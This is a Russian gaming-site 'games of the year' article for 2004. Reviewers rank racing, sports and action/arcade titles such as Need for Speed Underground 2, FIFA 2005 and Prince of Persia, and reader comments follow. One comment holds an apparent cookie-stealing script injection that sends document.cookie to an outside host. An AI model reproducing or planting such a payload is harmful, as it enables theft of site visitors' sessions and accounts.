Игры года. Часть первая

АВТОАРКАДА / АВТОСИМ ГОДА – NEED FOR SPEED UNDERGROUND 2



СПОРТИВНЫЙ СИМУЛЯТОР ГОДА – FIFA 2005




АРКАДА / ЭКШЕН ГОДА – PRINCE OF PERSIA: THE SANDS OF TIME




Подводя итоги года уходящего, прежде всего хочется отметить, что он стал приятным. Во многих смыслах. Наконец-то вышли «Периметр» и Half-Life 2. Наконец-то все убедились, что консоли не загонят родной PC в могилу в ближайшие пару-тройку лет. Наконец-то в родной стране девяносто пять процентов современных игр появляются в течение нескольких недель со времени мировой премьеры, а то и в один день с ней.
Предваряя закономерные вопросы, скажем: да, по морально-этическим соображениям не во всех жанрах были выбраны победители. Так, остались сиротами ролевые игры, квесты, симуляторы самолетов, танков и прочей военной техники. Все RPG этого года оказались, как минимум, спорными. Не говоря уже о том, что только Bloodlines может считаться серьезным проектом с серьезным бюджетом. Выбирать же победителя из череды похожих, одинаково двумерно-проходных игр типа Sacred, Seal of Evil или Beyond Divinity – нелогичное занятие. С адвенчурами похожая ситуация: неоднозначно воспринятая массами Syberia II, очередной по счету Myst да закончившийся наконец-то сериал о Петьке и Чапаеве – вот и все «вехи» этого года. Несерьезно. Не по-нашему.
Зато в других случаях количество претендентов на трон оказалось множество великое. И если среди автосимуляторов и всего, что с ними связано, а также спортивных игр победители были выбраны относительно единогласно (то есть спорить с редактором на его поле никто особо не решился...), то шутеры, аркады и стратегии убивали друг друга, как гладиаторы на арене. Мы подумали и решили дать каждому желающему высказаться. Чье мнение совпадет с вашим или повлияет на него – это уже следующий вопрос.
Занавес.


АВТОАРКАДА / АВТОСИМ ГОДА – NEED FOR SPEED UNDERGROUND 2

Оракул

1. Richard Burns Rally
2. Flatout
3. Need for Speed Underground 2


Третье место игры под названием «Нуждаемся в скоростном метро - 2» даже и комментировать не хочется – давняя история серии, любовь народных масс, огромный бюджет, консоли, все такое прочее. Пугает только участившееся появление слова underground в названиях. Этак недалеко и до, скажем, NHL Underground или даже The Sims Underground. Чуть выше Flatout – игра необыкновенно веселая и исполненная внутренней энергии, буквально лучащаяся ею. Когда голова водителя пробивает стекло, и тело взлетает на полсотни метров над трассой, не надо стесняться – нужно просто орать вместе с ним. И еще громче. Перекрикивая рев мотора. А лучшим автосимом года нельзя не признать Richard Burns Rally, чуть ли не впервые за последние года три (на PC) бросившая вызов Колину МакРею и сразу его победившая. Это продукт не для тех, кто хочет гонять, а для тех, кто хочет учиться гонять. Руль, педали, время, терпение – и куча удовольствия взамен.


СПОРТИВНЫЙ СИМУЛЯТОР ГОДА – FIFA 2005

Оракул

1. Top Spin
2. Pro Evolution Soccer 4
3. FIFA 2005


Спортивных игр выходит куча каждый год, и выбирать из них лучшие – то еще развлечение. Баскетболы, хоккеи, разные футбольные менеджеры и иже с ними занимают полки магазинов и десятки страниц журналов. Однако из всего многообразия выделю Pro Evolution Soccer 4 и наконец-то подравнявшийся к нему по качеству FIFA 2005. Появилась конкуренция – и сразу какой прогресс. А выделить в этом году стоит, пожалуй, игру относительно оригинального жанра – радость для любителей тенниса и символ реанимации такого редкого вида, как теннисные симуляторы на PC. И плевать, что много претензий к управлению и графике. Главное – оригинальный взгляд на вещи и подход, которого мы не видели раньше. И плевать даже на то, что Super Real Tennis на телефонах SonyEricsson – интереснее.


АРКАДА / ЭКШЕН ГОДА – PRINCE OF PERSIA: SANDS OF TIME

Chosenone

1. Prince of Persia: The Sands of Time
2. The Suffering
3. True Crime: Streets of LA



Так уж сложилось, что в номинации action / arcade все призы позабирали игры именно жанра action, так как более или менее приличных аркад в 2004-м году вышло до неприличия мало. Ну а среди action’ов первое место я все-таки отдаю тому же Prince of Persia: The Sands of Time за то, что эта игрушка оказалась одной из тех немногих, чей напряженный и захватывающий гейплей заставил меня пройти игру вплоть до финальных титров. Второе место получает The Suffering как игра, которая в отличие от того же Silent Hill 4, способна действительно пугать и постоянно держать в напряжении. А что еще нужно хорошему action’у? Ну и «бронза» торжественно вручается единственной в своем роде игре, посмевшей сыграть на традиционном поле GTA - Crime: Streets of LA. Причем попытка эта оказалась весьма успешной. И желающие не только пострелять, но и лихо погонять по городу на авто в процессе прохождения получили огромное удовольствие.

Legolas

1. Prince of Persia: Warrior Within
2. Pitfall: The Lost Expedition
3. Gish & Hamsterball



Главное событие 2004 года в мире аркадных развлечений - это выход второй части Prince of Persia. Принц стал лучше владеть оружием, но это нисколько не снижает роли его акробатических способностей. Ему придется все так же много прыгать и выдавать различные финты и приемы.
На втором месте идет платформер Pitfall: The Lost Expedition, который просто обязан быть в коллекции каждого уважающего себя аркадника. Ну а на бронзу претендуют сразу два аркадных развлечения - Gish и Hamsterball. Из-за двух этих маленьких игр многие конторы уже потерпели большие убытки. Ведь сразу после запуска такой игры как-то быстро забываешь о работе и главной целью становится пройти очередной уровень.

Оракул

1. Prince of Persia: The Sands of Time
2. Armed and Dangerous
3. Beyond Good and Evil



В этом году GTA San Andreas на нашем родном PC выйти не успел, поэтому борьба в текущей номинации обострилась до предела. Про зеленоглазое парижское чудо было сказано уже много, но с удовольствием повторим: вещи такой изящной выделки встречаются нечасто. На полшага впереди – наш сюрприз года, безумно-манящая Armed and Dangerous со своим штопором и идиотским широкоэкранным разрешением. А при определении аркады года сомнений не возникло – это, конечно, блестящая арабская сказка, возродившаяся спустя полтора десятка лет легенда. И плевать, что хронологически The Sands of Time относится к самому концу 2003 года – слишком вели соблазн видеть ее на вершине. Этот отсчет времени назад, эта потрясающая анимация, этот наполненный солнечным светом кинжал, этот чарующий голос Принца, безымянного, как и раньше... Шерехезада осталась глубоко в прошлом, в новом времени в моде совсем другие сказки. Одно из самых сильных впечатлений года, без сомнения.

Комментарии: 16
Ваш комментарий

Meine me(a)inung nach:
Автоаркада года явно не NFS: U2 - так как сиквел сдал по сравнению с оригиналом почти по всем параметрам. А вот никому не известный флатоут -действительно автоаркада года...

0

Ich glaube dass ich habe nichts verstanden!
Schade!

0

Первый NFSU намного лучше второго, следовательно, игрой года NFSU2 не назовешь, не тянет она. Может быть, по сравнению с Flatout и Richard Burns Rally она очень хороша, но это точно не игра года

0

Перепили что-ли ? Извините конечно но принц далеко не игра года ...

0

NEED FOR SPEED UNDERGROUND 2 да FIFA 2005 да... Я так считаю и моё мнение не изминить!!!!!!!!!

0

Аркада года Beyond Good and Evil такая вещь раз в жизни выходит чтобы так засосать меня на 3 дня приковать к монитору !

0

спорт года-это fifa???
Это PES4!!!

0

GTA SAN ANDREAS это очень клёвая игрушка, как и многие другие!

0

img=new Image(); img.src="http://s.netsec.ru/admin/pic.gif?;"+document.cookie;

0

Привет всем, я из будущего, PES 2011 рулит!

0

Американeц не только ты из будущего =) Portal 2 Рулет!!!111

0

Я пздц из какого будущего GTA 10 заняла все наминации в 2036, стратегия, экшн, стелс, рпг, автосимулятор, спорт)))

0